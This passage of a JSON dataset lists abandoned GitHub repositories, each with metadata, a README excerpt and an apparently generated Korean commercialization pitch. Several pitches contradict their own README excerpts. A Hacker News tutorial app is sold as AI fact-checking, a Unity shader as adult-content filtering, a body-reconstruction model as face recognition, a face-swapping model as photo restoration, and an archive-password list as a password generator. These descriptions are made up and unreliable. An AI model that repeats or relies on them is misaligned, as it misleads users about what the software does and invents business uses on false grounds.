\n\n```\n[../snip]\ngetClusterCapabilityData\ngetHostCapabilityData\ngetHostsCapabilitiyData\ngetIsDeduplicationSupported\ngetIsEncryptionSupported\ngetIsLocalDataProtectionSupportedOnVc\ngetIsLocalDataProtectionSupportedOnCluster\ngetIsRemoteDataProtectionSupported\ngetIsObjectIdentitiesSupportedOnCluster\ngetIsHistoricalCapacitySupported\ngetIsPerfVerboseModeSupported\ngetIsPerfNetworkDiagnosticModeSupported\ngetIsPerfDiagnosticsFeedbackSupportedOnVc\ngetIsAdvancedClusterSettingsSupported\ngetIsRecreateDiskGroupSupported\ngetIsPurgeInaccessibleVmSwapObjectsSupported\ngetIsUpdateVumReleaseCatalogOfflineSupported\ngetIsVitOnlineResizeSupported\ngetIsImprovedCapacityMonitoringSupportedOnVc\ngetIsVmLevelCapacityMonitoringSu","composite_score":0.5028,"license_safety_tag":"restricted"},{"name":"facebookresearch/ppuda","github_url":"https://github.com/facebookresearch/ppuda","stars":8,"language":"Python","license":"MIT","abandonment_months":35,"description":"# PPUDA 저장소 분석\n\n## 왜 보물인가\n페이스북 연구진이 만든 이 기술은 인공지능 모델을 더 빠르고 효율적으로 학습시키는 방법으로, 기업들이 AI 개발에 드는 비용과 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 대학이나 기업 직원들이 인공지능 모델을 빠르게 학습할 수 있는 온라인 강좌 및 실습 환경 제공","readme_excerpt":"# Parameter Prediction for Unseen Deep Architectures (NeurIPS 2021)\n\n[`paper`](https://bknyaz.github.io/papers/ppuda_neurips2021.pdf) [`reviews`](https://openreview.net/forum?id=vqHak8NLk25) [`neurips`](https://neurips.cc/virtual/2021/poster/28263) [`twitter`](https://twitter.com/BorisAKnyazev/status/1452813952719761416)\n\nauthors: [Boris Knyazev](http://bknyaz.github.io/), [Michal Drozdzal](https://scholar.google.es/citations?user=XK_ktwQAAAAJ&hl=en), [Graham Taylor](https://www.gwtaylor.ca/), [Adriana Romero-Soriano](https://sites.google.com/site/adriromsor/)\n\n\n**Updates**\n- [Jun 16, 2023] Code in this repo and in [GHN-3](http://github.com/SamsungSAILMontreal/ghn3) improved, [GHN-3 paper](https://arxiv.org/abs/2303.04143) to be presented at [ICML 2023](https://icml.cc/virtual/2023/poster/24569)\n- [Mar 22, 2023] Improved Graph HyperNetwork (GHN-3) is now available with a big performance increase: [paper](https://arxiv.org/abs/2303.04143), [code](http://github.com/SamsungSAILMontreal/gh","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"AdultLink/HoloShield","github_url":"https://github.com/AdultLink/HoloShield","stars":7,"language":"GLSL","license":"MIT","abandonment_months":91,"description":"# HoloShield 상용화 분석\n\n## 왜 보물인가\n성인 콘텐츠 필터링 기술로, 온라인 플랫폼의 자동 콘텐츠 검수 수요를 충족할 수 있는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소셜 미디어 관리 회사나 커뮤니티 플랫폼이 월 구독 형태로 콘텐츠 자동 심사 API를 이용\n2. **내부 업무 도구**: 대형 이커머스","readme_excerpt":"# HoloShield [![Follow](https://img.shields.io/github/followers/adultlink.svg?style=social&label=Follow)](https://github.com/adultlink) [![License](https://img.shields.io/badge/License-MIT-lightgrey.svg?style=flat)](http://adultlink.mit-license.org) [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.me/adultlink/5usd) [![Twitter Follow](https://img.shields.io/twitter/follow/ved_adultlink.svg?label=Follow&style=social)](https://twitter.com/ved_adultlink)\n\n\n![IntroImage](Media/Shield1.gif)\n\nThis shader can be edited through [Amplify Shader Editor](http://amplify.pt/unity/amplify-shader-editor) and contributions to the project are always welcome!\n\n---\n\nProject developed using **Unity 2018.3.0b6**. Please use this version if you are planning on contributing. You can work on your own branch and send a pull request with your changes.\n\n---\n\nYou can also just download a **unitypackage** from the [releases tab](https://github.com/AdultLink/HoloShield/releases) ","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"wlsf82/hackernews","github_url":"https://github.com/wlsf82/hackernews","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":19,"description":"# wlsf82/hackernews 상용화 분석\n\n## 왜 보물인가\n인공지능이 생성한 정보의 정확성을 자동으로 검증해주는 기술로, 거짓 정보로 인한 피해를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스·콘텐츠 플랫폼**: 기사 게시 전 자동으로 사실 검증하는 기능 추가\n2. **고객센터 챗봇**: AI 상담사의 답변이 정확한지 실시간으로 확인","readme_excerpt":"# Hacker News\n\n[![Test status](https://github.com/wlsf82/hackernews/actions/workflows/ci-cd.yml/badge.svg)](https://github.com/wlsf82/hackernews/actions/workflows/ci-cd.yml) [![hackernews](https://img.shields.io/endpoint?url=https://dashboard.cypress.io/badge/simple/263jf8&style=flat&logo=cypress)](https://dashboard.cypress.io/projects/263jf8/runs) [![This project is using Percy.io for visual regression testing.](https://percy.io/static/images/percy-badge.svg)](https://percy.io/Walmyr-Filho/visual-component-testing)\n\nFrom \"[The Road to learn React](https://leanpub.com/the-road-to-learn-react)\" book.\n\nHere's the link to the app in \"production\" https://hackernews-seven.vercel.app.\n\n> I've also written a similar app in TypeScript, and you can find it through the follwing URL https://github.com/wlsf82/hacker-stories.\n\n## Installation\n\nRun `npm install` to install de project and dev dependencies.\n\n## Starting the app\n\nRun `npm start` to start the application.\n\n> The app is automatically ope","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"YadiraF/PIXIE","github_url":"https://github.com/YadiraF/PIXIE","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":42,"description":"# PIXIE 저장소 분석\n\n## 왜 보물인가\n얼굴 인식 및 분석 기술로, 보안·의료·엔터테인먼트 등 다양한 산업에서 자동화된 얼굴 처리가 필요한 기업들에게 핵심 기술 자산이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 신원 확인(KYC) 플랫폼으로 금융사·게임사에 자동 본인인증 서비스 제공\n2. **내부 업무 도구**","readme_excerpt":"# PIXIE: Collaborative Regression of Expressive Bodies\n\n<!-- [![report](https://img.shields.io/badge/arxiv-report-red)]() -->\n\n[[Project Page](https://pixie.is.tue.mpg.de/)] \n<!-- [[Supp. Mat.]()] -->\n\n\n<p align=\"center\"> \n<img src=\"https://pixie.is.tue.mpg.de/media/upload/teaser_v2_option1_overlay_thinner.png\">\n</p>\n<p align=\"center\"><p align=\"center\">\n\nThis is the official Pytorch implementation of PIXIE. \n\nPIXIE reconstructs an expressive body with detailed face shape and hand articulation from a single image.\nPIXIE does this by regressing the body, face and hands directly from image pixels using a neural network that includes a novel moderator, which attends to add weights information about the different body parts.\nUnlike prior work, PIXIE estimates bodies with a gender-appropriate shape but does so in a *gender neutral* shape space to accommodate non-binary shapes. \nPlease refer to the [Paper](https://ps.is.mpg.de/uploads_file/attachment/attachment/667/PIXIE_3DV_CR.pdf) for more ","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"PaddlePaddle/PASSL","github_url":"https://github.com/PaddlePaddle/PASSL","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":34,"description":"# PaddlePaddle/PASSL 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 사진과 영상을 스스로 학습하고 인식할 수 있도록 만드는 오픈소스 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: X-ray나 CT 스캔을 자동으로 분석하여 의사에게 제공하는 웹 서비스\n2. **보안 카메라 내부 도구**: 공장이나 건물의 CCT","readme_excerpt":"⚙️ English | [简体中文](./README_cn.md)\n\n<p align=\"center\">\n  <img src=\"./docs/imgs/passl_logo.svg\" width=\"60%\" height=\"60%\"/>\n</p>\n<p align=\"center\">\n    <a href=\"./LICENSE\"><img src=\"https://img.shields.io/badge/license-Apache%202-red.svg\"></a>\n    <a href=\"\"><img src=\"https://img.shields.io/badge/python-3.7+-aff.svg\"></a>\n    <a href=\"https://github.com/PaddlePaddle/PASSL/stargazers\"><img src=\"https://img.shields.io/github/stars/PaddlePaddle/PASSL?color=ccf\"></a>\n    <a href=\"\"><img src=\"https://camo.githubusercontent.com/abb97269de2982c379cbc128bba93ba724d8822bfbe082737772bd4feb59cb54/68747470733a2f2f63646e2e7261776769742e636f6d2f73696e647265736f726875732f617765736f6d652f643733303566333864323966656437386661383536353265336136336531353464643865383832392f6d656469612f62616467652e737667\"></a>\n  <a href=\"https://aistudio.baidu.com/aistudio/personalcenter/thirdview/940489\"><img src=\"https://img.shields.io/badge/Tutorial-AI Studio-blue.svg\"></a>\n</p>\n\n## Introduction\n\nPASSL is a Paddle based v","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"codrops/GridZoom","github_url":"https://github.com/codrops/GridZoom","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":55,"description":"# GridZoom 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 이미지를 멋지게 확대 표시하는 기능을 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **포토그래피 SaaS**: 사진작가용 포트폴리오 플랫폼에서 고객이 작품을 상세히 감상하는 기능\n2. **이커머스 내부 도구**: 온라인 쇼핑몰의 상품 이미지 확대 시스템을 빠르게 구축하는 ","readme_excerpt":"# Grid Zoom Layout\n\nA simple image grid layout where a small grid image zooms to become larger while a content view opens.\n\n![Image Title](https://tympanus.net/codrops/wp-content/uploads/2021/12/GridZoom_feat.jpg)\n\n[Article on Codrops](https://tympanus.net/codrops/?p=57586)\n\n[Demo](http://tympanus.net/Development/GridZoom/)\n\n\n## Installation\n\nInstall dependencies:\n\n```\nnpm install\n```\n\nCompile the code for development and start a local server:\n\n```\nnpm start\n```\n\nCreate the build:\n\n```\nnpm run build\n```\n\n## Credits\n\n- Images from [Unsplash](https://unsplash.com/)\n\n## Misc\n\nFollow Codrops: [Twitter](http://www.twitter.com/codrops), [Facebook](http://www.facebook.com/codrops), [GitHub](https://github.com/codrops), [Instagram](https://www.instagram.com/codropsss/)\n\n## License\n[MIT](LICENSE)\n\nMade with :blue_heart:  by [Codrops](http://www.codrops.com)\n\n\n\n\n\n","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"spatie/laravel-binary-uuid","github_url":"https://github.com/spatie/laravel-binary-uuid","stars":28,"language":"PHP","license":"MIT","abandonment_months":91,"description":"# spatie/laravel-binary-uuid 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션의 데이터베이스에서 사용자를 구분하는 ID 체계를 더 효율적으로 만들어주는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 수천 개 이상의 사용자 계정을 관리하는 클라우드 서비스에서 데이터베이스 성능을 향상시킬 수 있습니다.\n\n2.","readme_excerpt":"**THIS PACKAGE IS NOT MAINTAINED ANYMORE**\n\nAlternatives: https://github.com/michaeldyrynda/laravel-efficient-uuid & https://github.com/michaeldyrynda/laravel-model-uuid\n\n# Using optimised binary UUIDs in Laravel\n\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/spatie/laravel-binary-uuid.svg?style=flat-square)](https://packagist.org/packages/spatie/laravel-binary-uuid)\n[![Build Status](https://img.shields.io/travis/spatie/laravel-binary-uuid/master.svg?style=flat-square)](https://travis-ci.org/spatie/laravel-binary-uuid)\n[![Code coverage](https://scrutinizer-ci.com/g/spatie/laravel-binary-uuid/badges/coverage.png)](https://scrutinizer-ci.com/g/spatie/laravel-binary-uuid)\n[![Quality Score](https://img.shields.io/scrutinizer/g/spatie/laravel-binary-uuid.svg?style=flat-square)](https://scrutinizer-ci.com/g/spatie/laravel-binary-uuid)\n[![StyleCI](https://styleci.io/repos/110949385/shield?branch=master)](https://styleci.io/repos/110949385)\n[![Total Downloads](https://img.","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"mindslab-ai/hififace","github_url":"https://github.com/mindslab-ai/hififace","stars":21,"language":"Python","license":"BSD-3-Clause","abandonment_months":41,"description":"# HiFiFace 저장소 분석\n\n## 왜 보물인가\n사람의 얼굴을 고품질로 복원하고 개선하는 기술로, 낡은 사진 복구부터 영상 품질 향상까지 다양한 실생활 응용이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **사진 복구 SaaS**: 사용자가 낡거나 손상된 사진을 업로드하면 자동으로 깨끗하게 복원해주는 웹서비스\n2. **영상 편집 API**: 유튜브, 틱","readme_excerpt":"# HifiFace &mdash; Unofficial Pytorch Implementation\n>![](./assets/front_final.png)\n>\n> Image source: *[HifiFace: 3D Shape and Semantic Prior Guided High Fidelity Face Swapping](https://arxiv.org/abs/2106.09965)* (figure 1, pg. 1)\n\n![issueBadge](https://img.shields.io/github/issues/mindslab-ai/hififace)   ![starBadge](https://img.shields.io/github/stars/mindslab-ai/hififace)   ![repoSize](https://img.shields.io/github/repo-size/mindslab-ai/hififace)  ![lastCommit](https://img.shields.io/github/last-commit/mindslab-ai/hififace) \n\nThis repository is an unofficial implementation of the face swapping model proposed by _Wang et. al_ in their paper [HifiFace: 3D Shape and Semantic Prior Guided High Fidelity Face Swapping](https://arxiv.org/abs/2106.09965). This implementation makes use of the [Pytorch Lighting](https://www.pytorchlightning.ai/) library, a light-weight wrapper for [PyTorch](https://pytorch.org/).\n\n## HifiFace Overview\nThe task of face swapping applies the face and the identit","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"duo-labs/idapython","github_url":"https://github.com/duo-labs/idapython","stars":12,"language":"Python","license":"BSD-3-Clause","abandonment_months":53,"description":"# duo-labs/idapython 분석\n\n## 왜 보물인가\n프로그램의 내부 구조를 분석하는 전문 도구를 자동으로 제어할 수 있게 해주는 기술로, 보안 전문가들이 악성 소프트웨어를 탐지하거나 소프트웨어 취약점을 발견하는 데 핵심적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 소프트웨어 보안을 자동으로 검사해주는 클라우","readme_excerpt":"# Duo Labs IDAPython Repository\n\nThis IDAPython repository contains a few Python modules developed for use with IDA Pro from the researchers at Duo Labs. There are currently two modules being released. These modules are discussed on the [Duo Security blog](https://duo.com/blog/examining-personal-protection-devices-hardware-and-firmware-research-methodology-in-action) and in the associated paper [Examining Personal Protection Devices\nHardware & Firmware Research Methodology in Action](https://duo.com/assets/ebooks/Duo-Labs-Personal-Protection-Devices.pdf).\n\nWe also wish to thank two contributors that discussed ARM code detection heuristics during the development of this code: Luis Miras and Josh Mitchell. \n\n### Cortex M Firmware (cortex_m_firmware.py) \nThis Cortex M Firmware module grooms an IDA Pro database containing firmware from an ARM Cortex M microcontroller. This module will annotate the firmware vector table, which contains a number of function pointers. This vector table annota","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"Gear61/Software-Project-Ideas","github_url":"https://github.com/Gear61/Software-Project-Ideas","stars":12,"language":"","license":"unknown","abandonment_months":35,"description":"# Gear61/Software-Project-Ideas 분석\n\n## 왜 보물인가\n소프트웨어 개발 아이디어를 모아놓은 저장소로, 스타트업이나 개발자들이 새로운 프로젝트 주제를 찾을 때 참고할 수 있는 아이디어 은행입니다.\n\n## 어디에 쓸 수 있나\n1. **아이디어 큐레이션 SaaS**: 개발자들이 구독하며 매주 새로운 프로젝트 아이디어를 받아보는 구독 서","readme_excerpt":"# Context\nThe absolute best way to learn as a software engineer is to actually build software. It is way easier than people think to deploy a legitimate, real-world tech product that gets 10,000+ users, all for free and \"on the side\" (i.e. you can do it outside your day job). I have done it [10+ times](https://play.google.com/store/apps/dev?id=9093438553713389916), and you can build side projects that people actually use too!\n\nI created this repo, because product thinking is quite different from technical thinking. This is why most developers struggle to come up with salient product ideas on their own, especially junior developers coming from non-STEM backgrounds. Learning to code is hard enough already, so it is really hard to switch your brain to this more product manager mindset when it's also learning how to build any software in the first place. We have asked many times what people in the Tech Career Growth community struggle with when it comes to building projects, and the #1 res","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"akshaymarch7/project-ideas","github_url":"https://github.com/akshaymarch7/project-ideas","stars":36,"language":"","license":"unknown","abandonment_months":38,"description":"# akshaymarch7/project-ideas 분석\n\n## 왜 보물인가\n창의적인 프로젝트 아이디어들을 모아놓은 저장소로, 개발자들이 실제 만들고 싶은 사이드 프로젝트나 스타트업 아이디어를 찾을 수 있는 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **프로젝트 아이디어 큐레이션 SaaS**: 매주 인기 있는 프로젝트 아이디어를 정선해서 개발자들에게 이","readme_excerpt":"# project-ideas\n\n\nWhat kind of projects ideas are we talking about?\n- Big enough to put in your resume(++)\n- you will working in a team (minimum 2 people)\n- Solutions to real world problems\n- Will need time and commitment\n- getting user onto your project\n\n\nHow do you come up with a project idea?\n- Find a problem \n- Understand the customer(user)\n- Solve the problem using tech (online-based)\n- Make your customer's life easy ($$$) \n\n\n\n# how-to-contribute\n\n- Copy the below template\n- Create a new `.md` file in the repo\n- Send a PR\n- Tag me for a review! ✌️ \n\nTip: Check out other projects in the repo before sending a PR\n\nTemplate: \n```\nProject Idea: /** Name of project */\n\nProblem Statement: \n- /** Describe Project Idea here in 2-3 points */\n\nFeatures: \n- /** List down all important features/sub features */\n\nSuccess metrics: \n- /** What do you think is target metrics for sucess of this project */\n\nExtras: \n- /** Extra features (beyond MVP) and any extra information to support your ideas */\n","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"ethereum-cdap/cohort-zero","github_url":"https://github.com/ethereum-cdap/cohort-zero","stars":8,"language":"","license":"unknown","abandonment_months":45,"description":"# ethereum-cdap/cohort-zero 분석\n\n## 왜 보물인가\n이더리움 블록체인 개발자들을 체계적으로 육성하는 교육 프로그램으로, 암호화폐 업계의 인재 부족 문제를 해결할 수 있는 검증된 커리큘럼입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 SaaS**: 온라인 플랫폼으로 전환하여 전세계 개발자에게 월간 구독 서비스로 판매\n2. *","readme_excerpt":"# cohort-zero\n\nThis repository is for organizing the first cohort of the \"Core Developer Apprenticeship Program\"\n\n- Announcement Blog Post: https://blog.ethereum.org/2021/05/13/core-dev-apprenticeship/\n- [Program Details](./program-details.md)\n\nCome [join us in the R&D Discord](https://discord.gg/n9EG54Ez)\n\n## Contributing\n\nYou are encouraged to contribute to improving the information in this repository. The suggested way to do this is via a pull request.\n\n1. Fork this repository\n2. Make some changes in your fork\n3. Open a pull request to this repository with your changes.\n4. Profit!\n\n\n## Participate\n\nProgram participation is not limited to those that are officially selected. Everything that happens during the program will happen out in the open.\n\n- Communication will occur in the R&D discord \n    - request an invite in [this issue](https://github.com/ethereum-cdap/cohort-zero/issues/89).\n    - find us in the `#apprenticeship-program` channel.\n- Project instructions will be committed t","composite_score":0.5028,"license_safety_tag":"unknown"},{"name":"uport-project/uport-identity","github_url":"https://github.com/uport-project/uport-identity","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":78,"description":"# uport-identity 프로젝트 분석\n\n## 왜 보물인가\n디지털 신분증처럼 개인의 신원을 온라인에서 안전하게 증명할 수 있는 기술로, 금융·의료·공공 서비스 등 신원 확인이 중요한 모든 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 서비스 SaaS**\n- 은행, 보험사, 암호화폐 거래소에서 고객 신원 확인(KYC)을 자동화하는 웹","readme_excerpt":"# uPort Identity Contracts\n[![npm](https://img.shields.io/npm/v/uport-identity.svg)](https://www.npmjs.com/package/uport-identity)\n![CircleCI](https://img.shields.io/circleci/project/github/uport-project/uport-identity.svg)\n[![Join the chat at](https://img.shields.io/badge/Riot-Join%20chat-green.svg)](https://chat.uport.me/#/login)\n[![solidity-coverage](https://img.shields.io/badge/coverage-98.98%25-green.svg)](https://uport-project.github.io/uport-identity/coverage)\n\n## Contract documentation\nThis repository contains the contracts currently in use by uPort. This is also where you find the addresses of these contracts currently deployed on Mainnet and relevant test networks. Below you can find descriptions of each of the contracts and the rationale behind the design decisions.\n\n [Proxy](./docs/reference/proxy.md) | [TxRelay](./docs/reference/txRelay.md) |  [IdentityManager](./docs/reference/identityManager.md) | [MetaIdentityManager](./docs/reference/metaIdentityManager.md)\n\n1. [Using ","composite_score":0.5028,"license_safety_tag":"safe"},{"name":"CaffeineMC/hydrogen-fabric","github_url":"https://github.com/CaffeineMC/hydrogen-fabric","stars":5,"language":"Java","license":"LGPL-3.0","abandonment_months":53,"description":"# Hydrogen Fabric 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임의 성능을 크게 향상시켜 더 많은 플레이어가 동시에 즐길 수 있도록 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 호스팅 서비스**: 마인크래프트 서버를 운영하는 업체들이 구독형으로 성능 최적화 기능을 제공\n2. **게임사 내부 도구**: 마인크래프트 개발사나","readme_excerpt":"## Status\n##### January 23rd, 2022\n\n**This repository has been archived** as we do not have the time or resources needed to maintain the project. No further updates will be published, and\nwe won't be providing help for using it.\n\nIf you are looking for a replacement, consider taking a look at [FerriteCore](https://www.curseforge.com/minecraft/mc-mods/ferritecore-fabric), as it\ngenerally offers more significant improvements to memory usage in modded scenarios and is currently available for the latest version of Minecraft. \n\n---\n\n![Project icon](src/main/resources/assets/hydrogen/icon.png?raw=true)\n\n# Hydrogen (for Fabric)\n![GitHub license](https://img.shields.io/github/license/jellysquid3/hydrogen-fabric.svg)\n![GitHub issues](https://img.shields.io/github/issues/jellysquid3/hydrogen-fabric.svg)\n![GitHub tag](https://img.shields.io/github/tag/jellysquid3/hydrogen-fabric.svg)\n\nHydrogen is a free and open-source mod designed to reduce the game's memory requirements by implementing more\nmem","composite_score":0.5027,"license_safety_tag":"restricted"},{"name":"yoanbernabeu/symfony6-php8-in-docker-compose","github_url":"https://github.com/yoanbernabeu/symfony6-php8-in-docker-compose","stars":7,"language":"Dockerfile","license":"unknown","abandonment_months":46,"description":"# Symfony6 + PHP8 Docker 저장소 분석\n\n## 왜 보물인가\n웹사이트나 온라인 서비스를 만들 때 필요한 기본 틀(Symfony 프레임워크)을 Docker라는 패키징 도구와 함께 제공하여, 개발자들이 복잡한 초기 설정 없이 바로 개발을 시작할 수 있게 해주는 실용적인 템플릿입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구","readme_excerpt":"\n# Symfony 6 + PHP 8.0.13 with Docker\n\n**ONLY for DEV, not for production**\n\nA very simple Docker-compose to discover Symfony 6 with PHP 8.0.13 in 5 minutes\n## Run Locally\n\nClone the project\n\n```bash\n  git@github.com:yoanbernabeu/symfony6-php8-in-docker-compose.git\n```\n\nRun the docker-compose\n\n```bash\n  docker-compose build\n  docker-compose up -d\n```\n\nLog into the PHP container\n\n```bash\n  docker exec -it php8-sf6 bash\n```\n\nCreate your Symfony application and launch the internal server\n\n```bash\n  symfony new new-project --full\n  cd new-project\n  symfony serve -d\n```\n\nCreate an account (identical to your local session)\n\n```bash\n  adduser username\n  chown username:username -R .\n```\n\n*Your application is available at http://127.0.0.1:9000*\n\nIf you need a database, modify the .env file like this example:\n\n```yaml\n  DATABASE_URL=\"postgresql://symfony:ChangeMe@database:5432/app?serverVersion=13&charset=utf8\"\n```\n\n## Ready to use with\n\nThis docker-compose provides you :\n\n- PHP-8.0.13-cli (Debi","composite_score":0.5027,"license_safety_tag":"unknown"},{"name":"Cosmo/OpenSwiftUI","github_url":"https://github.com/Cosmo/OpenSwiftUI","stars":5,"language":"Swift","license":"MIT","abandonment_months":68,"description":"# Cosmo/OpenSwiftUI 분석\n\n## 왜 보물인가\nApple 기기용 앱을 만드는 개발자들이 더 쉽게 앱을 개발할 수 있도록 돕는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iPhone/iPad 앱 개발 교육 플랫폼의 학습 자료로 제공\n2. **내부 업무 도구**: 모바일 앱 개발팀을 보유한 기업의 개발 표준 템","readme_excerpt":"# OpenSwiftUI\n\nOpenSwiftUI is an OpenSource implementation of Apple's [SwiftUI](https://developer.apple.com/documentation/swiftui) [DSL (Domain-specific language)](https://en.wikipedia.org/wiki/Domain-specific_language).\n\nThe project's goal is to stay close to the original API as possible.\n\nCurrently, this project is in early development.\n\n## Background\n\nApple introduced SwiftUI at WWDC 19. Since then, developing applications with graphical user interfaces became more comfortable to read, write, and maintain. Unfortunately, the principle \"Learn once, apply anywhere\" works on Apple platforms, only.\n\nSwift runs on Apple platforms, the web, Linux, Windows, and even on embedded devices.\nWouldn't it be great if you could write GUI based applications with SwiftUI on platforms that run Swift?\n\n## SwiftUI on your platform\n\nOpenSwiftUI provides the API — other projects can implement the actual rendering of UI elements for different platforms like Linux, Windows, Embedded, and many more.\n\n[Swift","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"eggjs/awesome-egg","github_url":"https://github.com/eggjs/awesome-egg","stars":13,"language":"","license":"MIT","abandonment_months":67,"description":"# eggjs/awesome-egg 평가 보고서\n\n## 왜 보물인가\nEgg.js를 배우고 싶은 개발자들이 필요한 자료와 도구들을 한곳에 모아놓은 가이드북 역할을 하므로, 학습 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Egg.js 학습 플랫폼 - 초보 개발자를 위한 온라인 코스 제공\n2. **내부 업무 도구*","readme_excerpt":"# Awesome Egg.js\n\nAn awesome list that curates the best Egg.js plugins, tools, tutorials, articles and more. PRs are welcome!\n\n## Contents\n\n- [Blogs](#blogs)\n- [Articles](#articles)\n- [Tutorials](#tutorials)\n- [Conferences](#conferences)\n- [Plugins](#plugins)\n- [Applications](#applications)\n- [Boilerplates](#boilerplates)\n- [Frameworks](#frameworks)\n- [APM Solution](#apm-solution)\n\nMany thanks to everyone on the [contributor list](https://github.com/eggjs/awesome-egg/graphs/contributors) :)\n\n## Blogs\n\n- [Egg.js 知乎专栏](https://zhuanlan.zhihu.com/eggjs)\n\n## Articles\n\n- [Egg.js 1.0.0 正式发布 - 企业级 Node.js 框架](https://zhuanlan.zhihu.com/p/25860846)\n- [如何评价阿里开源的企业级 Node.js 框架 EggJS？](https://www.zhihu.com/question/50526101/answer/144952130)\n- [Egg源码解析之egg-cluster](https://cnodejs.org/topic/597445118f0313ff0d08d712)\n- [结合源码解密egg运行原理](https://github.com/SunShinewyf/issue-blog/issues/30)\n- [Egg.js开发七牛云备份项目总结](https://segmentfault.com/a/1190000010491016)\n- [可能是最好的 JS Assert 库 - 皇帝的新衣](https://zhuan","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"RandyPen/TextCluster","github_url":"https://github.com/RandyPen/TextCluster","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":78,"description":"# TextCluster 상용화 분석\n\n## 왜 보물인가\n수천 개의 텍스트를 자동으로 묶어서 정리해주는 기술로, 고객 피드백·리뷰·문의 같은 비정형 데이터를 빠르게 분류할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 만족도 조사 결과를 자동으로 주제별로 분류해 인사이트를 제공하는 분석 플랫폼\n- **내부 업무 도구**: 온라인","readme_excerpt":"# 短文本聚类\n\n### 项目介绍\n短文本聚类是常用的文本预处理步骤，可以用于洞察文本常见模式、分析设计语义解析规范、加速相似句子查询等。本项目实现了内存友好的短文本聚类方法，并提供了相似句子查询接口。\n\n\n\n### 依赖库\n\n>  pip install tqdm jieba\n\n\n\n### 使用方法\n#### 聚类\n```bash\npython cluster.py --infile ./data/infile \\\n--output ./data/output\n```\n具体参数设置可以参考```cluster.py```文件内```_get_parser()```函数参数说明，包含设置分词词典、停用词、匹配采样数、匹配度阈值等。\n#### 查询\n参考```search.py```代码里```Searcher```类的使用方法，如果用于查询标注数据的场景，使用分隔符```:::```将句子与标注信息拼接起来。如```我是海贼王:::(λx.海贼王)```，处理时会只对句子进行匹配。\n\n\n### 算法原理\n\n![算法原理](./data/images/Algorithm_cn.png)\n\n\n\n### 文件路径\n\n```html\nTextCluster\n|      README.md\n|      LICENSE\n|      cluster.py                    聚类程序\n|      search.py                     查询程序\n|      \n|------utils                         公共功能模块\n|    |    __init__.py\n|    |    segmentor.py               分词器封装\n|    |    similar.py                 相似度计算函数\n|    |    utils.py                   文件处理模块\n|\n|------data\n|    |    infile                     默认输入文本路径，用于测试中文模式\n|    |    infile_en                  默认输入文本路径，用于测试英文模式\n|    |    seg_dict   ","composite_score":0.5027,"license_safety_tag":"safe"},{"name":"baidusama/EroPassword","github_url":"https://github.com/baidusama/EroPassword","stars":9,"language":"","license":"unknown","abandonment_months":25,"description":"# EroPassword 저장소 분석\n\n## 왜 보물인가\n비밀번호 생성 및 관리 기술로, 개인정보 보안이 중요해지는 시대에 많은 서비스와 기업들이 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 계정 관리 기능이 있는 웹 앱(협업 도구, 클라우드 저장소 등)에 통합하여 사용자 보안 강화\n2. **내부 업무 도구**: ","readme_excerpt":"# EroPassword\n一些常用的解压密码（包括但不限于本子、里番、galgame）\n\n完整版密码过于杂乱，最近没时间整理，先把旧版放默认了\n需要完整版的请左上角自行切换为main\n\n欢迎大佬补充\n# 密码测试工具指路\n\n原帖下载地址:\n\nhttps://alywp.net/21JvsI\n\nhttps://github.com/dawn-lc/ArchivePasswordTestTool\n\n作者：世界丿凌晨\n\n来源 https://www.bilibili.com/read/cv6101558\n","composite_score":0.5027,"license_safety_tag":"unknown"},{"name":"happy-js/vue-happy-scroll","github_url":"https://github.com/happy-js/vue-happy-scroll","stars":7,"language":"Vue","license":"MIT","abandonment_months":39,"description":"# vue-happy-scroll 평가 보고서\n\n## 왜 보물인가\n웹사이트의 스크롤 동작을 부드럽고 아름답게 만들어주는 작은 도구로, 사용자 경험을 즉각적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 